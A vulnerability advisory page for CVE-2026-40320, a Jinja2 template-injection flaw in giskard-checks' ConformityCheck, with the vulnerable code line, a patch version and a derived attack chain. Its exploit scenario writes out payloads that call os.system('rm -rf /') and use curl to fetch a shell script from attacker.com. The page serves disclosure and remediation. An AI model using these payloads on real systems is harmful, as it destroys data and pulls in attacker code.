Skip to main content

Ssti CVE-2026-40320

MEDIUM
Improper Neutralization of Special Elements Used in a Template Engine (CWE-1336)
2026-04-14 https://github.com/Giskard-AI/giskard-oss GHSA-7xjm-g8f4-rp26
RCE Ssti Python
5.4
CVSS 4.0
Share

CVSS VectorNVD

CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Local
Attack Complexity
Low
Privileges Required
Low
User Interaction
P
Scope
X

Lifecycle Timeline

5
CVSS changed
Apr 17, 2026 - 18:22 NVD
5.4 (MEDIUM)
Patch released
Apr 15, 2026 - 02:30 nvd
Patch available
Analysis Generated
Apr 15, 2026 - 01:13 vuln.today
Analysis Generated
Apr 14, 2026 - 23:31 vuln.today
CVE Published
Apr 14, 2026 - 23:13 nvd
MEDIUM 5.4

DescriptionNVD

Summary

The ConformityCheck class in giskard-checks rendered the rule parameter through Jinja2's default Template() constructor. Because the rule string is silently interpreted as a Jinja2 template, a developer may not realize that template expressions embedded in rule definitions are evaluated at runtime. In a scenario where check definitions are loaded from an untrusted source (e.g. a shared project file or externally contributed configuration), this could lead to arbitrary code execution.

giskard-checks is a local developer testing library with no network-facing service. Check definitions, including the rule parameter, are provided in application code or project configuration files and executed locally. Exploitation requires write access to a check definition and subsequent execution of the test suite by a developer.

However, the implicit template evaluation of the rule parameter is not obvious from the API surface. This hidden behavior increases the likelihood of a developer inadvertently passing untrusted input to it when integrating the library into a larger system.

Affected Component

conformity.py, line 59:

python
from jinja2 import Template
...
formatted_rule = Template(self.rule).render(trace=trace)

Affected Versions

giskard-checks < 1.0.2b1

Patched Version

giskard-checks >= 1.0.2b1 (template parsing removed from rule evaluation entirely)

Remediation

Upgrade to giskard-checks >= 1.0.2b1. The template rendering has been removed from rule evaluation.

Credit

Giskard-AI thanks @dhabaleshwar for identifying the unsandboxed template usage.

AnalysisAI

Remote code execution in giskard-checks through server-side template injection (SSTI) in the ConformityCheck class allows arbitrary Python code execution when the rule parameter is processed via unsandboxed Jinja2 template rendering. Affected versions prior to 1.0.2b1 silently interpret rule strings as Jinja2 templates, enabling attackers with write access to check definitions or configuration files to inject malicious template expressions that execute during test suite execution. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Attacker writes malicious rule definition to shared config file
Delivery
Developer integrates and runs test suite locally
Exploit
ConformityCheck class loads rule parameter
Install
Jinja2 Template() interprets rule as template code
C2
Template expression injects __import__('os').system() call
Execute
Arbitrary code executes with developer privileges
Impact
Attacker achieves code execution and data exfiltration
Sign in to reveal

Vulnerability AssessmentAI

Risk Assessment Although CVSS and EPSS scores are not available in the provided data, the real-world risk is elevated due to several factors: (1) Confirmed vulnerability in a development/testing library where code execution is the natural impact; (2) CWE-1336 is a well-understood template injection class with reliable exploitation techniques; (3) Attack vector is local but realistic-shared project files, pull requests with configuration changes, or integration of third-party check definitions are common collaboration patterns in development workflows; (4) No authentication bypass required; (5) SSVC framing suggests moderate exploitability (requires local write access and developer action) but high technical impact (code execution). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario A developer collaborating on a shared giskard-checks project receives a pull request that updates a rule definition in a check configuration file. The attacker embeds a Jinja2 template expression such as {{ __import__('os').system('rm -rf /') }} or {{ __import__('subprocess').check_output(['curl', 'attacker.com/shell.sh']) }} within the rule parameter. …
Remediation Upgrade giskard-checks to version 1.0.2b1 or later immediately. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Threat intelligence, references, and detailed analysis are available after sign-in.

More from same product – last 7 days

CVE-2026-41065 HIGH
8.9 Jun 04

Remote code execution in Tautulli versions prior to 2.17.1 allows attackers to achieve unauthenticated RCE on fresh inst
CVE-2026-44181 CRITICAL
Jun 03

Server-side template injection in Jupyter Enterprise Gateway versions 2.0.0rc2 through 3.2.x allows remote attackers to

Share

CVE-2026-40320 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy